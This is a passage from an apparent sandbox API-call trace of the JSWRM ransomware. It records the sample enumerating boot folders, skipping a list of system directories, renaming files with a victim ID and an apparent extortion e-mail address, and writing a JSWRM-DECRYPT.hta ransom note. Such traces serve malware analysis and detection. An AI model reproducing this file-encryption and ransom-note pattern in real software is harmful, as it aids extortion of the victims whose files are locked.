(lpString1="memtest.exe.mui", lpString2="..") returned 1 [0063.719] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0063.719] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0063.719] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0063.719] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0063.719] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0063.719] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.719] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0063.719] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0063.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0063.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0063.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.719] CreateFileW (lpFileName="C:\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.721] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561371256) returned 0 [0063.721] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.721] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.721] CloseHandle (hObject=0xffffffff) returned 1 [0063.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0063.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0063.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0063.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226730 [0063.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0063.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0063.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226730 | out: hHeap=0x1e0000) returned 1 [0063.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.722] MoveFileW (lpExistingFileName="C:\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\el-GR\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0063.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.722] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb5a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0063.722] FindClose (in: hFindFile=0x231b00 | out: hFindFile=0x231b00) returned 1 [0063.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0063.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0063.722] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="en-GB", cAlternateFileName="")) returned 1 [0063.722] lstrcmpiW (lpString1="en-GB", lpString2=".") returned 1 [0063.722] lstrcmpiW (lpString1="en-GB", lpString2="..") returned 1 [0063.722] lstrcmpiW (lpString1="en-GB", lpString2="...") returned 1 [0063.723] lstrcmpiW (lpString1="en-GB", lpString2="windows") returned -1 [0063.723] lstrcmpiW (lpString1="en-GB", lpString2="recovery") returned -1 [0063.723] lstrcmpiW (lpString1="en-GB", lpString2="perflogs") returned -1 [0063.723] lstrcmpiW (lpString1="en-GB", lpString2="documents and settings") returned 1 [0063.723] lstrcmpiW (lpString1="en-GB", lpString2="$RECYCLE.BIN") returned 1 [0063.723] lstrcmpiW (lpString1="en-GB", lpString2="system volume information") returned -1 [0063.723] lstrcmpiW (lpString1="en-GB", lpString2="msocache") returned -1 [0063.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0063.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0063.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237308 [0063.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.723] GetFileAttributesW (lpFileName="C:\\Boot\\en-GB\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\en-gb\\jswrm-decrypt.hta")) returned 0xffffffff [0063.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237308 | out: hHeap=0x1e0000) returned 1 [0063.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0063.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0063.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0063.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0063.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0063.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236db8 [0063.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.724] CreateFileW (lpFileName="C:\\Boot\\en-GB\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\en-gb\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.724] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.724] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0063.726] CloseHandle (hObject=0x450) returned 1 [0063.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236db8 | out: hHeap=0x1e0000) returned 1 [0063.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0063.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0063.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0063.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2370d8 [0063.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.727] GetFileAttributesW (lpFileName="C:\\Boot\\en-GB\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\en-gb\\jswrm-decrypt.hta")) returned 0x20 [0063.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2370d8 | out: hHeap=0x1e0000) returned 1 [0063.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0063.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.727] FindFirstFileW (in: lpFileName="C:\\Boot\\en-GB\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x1ca39084, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232180 [0063.727] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.727] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x1ca39084, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0063.727] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.727] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.728] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0063.728] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0063.728] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0063.728] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0063.728] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0063.728] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0063.728] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0063.728] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0063.728] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.728] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0063.728] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0063.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0063.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0063.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.728] CreateFileW (lpFileName="C:\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.728] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0063.728] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.729] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.729] CloseHandle (hObject=0xffffffff) returned 1 [0063.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0063.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0063.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0063.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0063.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2268b0 [0063.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0063.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0063.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2268b0 | out: hHeap=0x1e0000) returned 1 [0063.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0063.730] MoveFileW (lpExistingFileName="C:\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\en-GB\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0063.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.730] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ca39084, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1ca39084, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1ca5f2b5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0063.730] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0063.730] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0063.730] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0063.730] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0063.730] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0063.730] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0063.730] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0063.730] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0063.730] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0063.730] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0063.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0063.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0063.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f98, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.731] RtlAllocateHeap 